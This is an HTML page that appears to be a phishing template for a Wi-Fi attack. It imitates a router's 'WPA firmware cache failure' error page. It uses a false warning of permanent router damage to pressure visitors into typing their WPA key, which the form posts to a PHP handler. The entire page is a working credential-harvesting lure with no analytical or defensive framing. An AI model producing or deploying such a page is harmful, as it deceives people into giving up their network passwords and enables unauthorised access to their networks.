<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="generator" content="CoffeeCup HTML Editor (www.coffeecup.com)">
    <meta name="dcterms.created" content="Sun, 20 Oct 2013 14:44:05 GMT">
    <meta name="description" content="">
    <meta name="keywords" content="">
    <title>firmware failure warning 4489</title>
    <! -- background-image:url(''); -->
    <style type="text/css">
    <!--
    body {
      color:#000000;
      background-color:#FF8000;
      background-image: url('');
      background-repeat:no-repeat;
    }
    a  { color:#0000FF; }
    a:visited { color:#800080; }
    a:hover { color:#008000; }
    a:active { color:#FF0000; }
    -->
    </style>
    <!--[if IE]>
    <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
  </head>
<title>WPA Firmware Protected Object Failure</title></head><body>
<h1><div align="center">WPA-Pmk Firmware Cache Protected Object Failure</h1></div>
<div align="center"><b>Do not unplug or reset router. This object on the RomPager server is protected.</b></div>
  <body>
  <br />
<div align="center"><b>Failure to reinitialize cache will result in permanent loss of router function!<br /></div>
<br />
<b>&nbsp&nbsp&nbsp&nbsp&nbsp&nbspROM Fault Page:<br /> 
<br />
<div align="center"><object width='70%' height='50' type='text/plain' data='routertype' border='2' ></object></div>
<br />
<div align="center"></>To reinitialize the WPA firmware cache, enter your WPA key below.</b></div>

<div align="center"></div>
<br />
  <center>
<form action="process-form-data.php" method="post">
<fieldset style="border: none;"><!-- Removes Large Border around the input area -->
<table width="320">
	<tr>
		<td colspan="1" align=right><strong>WPA&nbsp;Key</strong>:</td>
		<td colspan="3" width="100%"><input style="width:100%;" name="login" type="text"/></td>

	</tr>
    <tr>
		<td colspan="1" align=right><strong>WPA&nbsp;Key</strong>:</td>
		<td colspan="3" width="100%"><input style="width:100%;" type="text" name="password" /></td>
	</tr>

	</tr>
	<tr>
	</tr>
	<tr></tr>
	<td align=right><input type="submit" value="Submit" name="facebook" /></td>
  <tr></tr>
</table>
<div align="right"><font size="3"><sub><i>firmware product page <u>20223</u></i></sub></font></div>
  </body>
</html>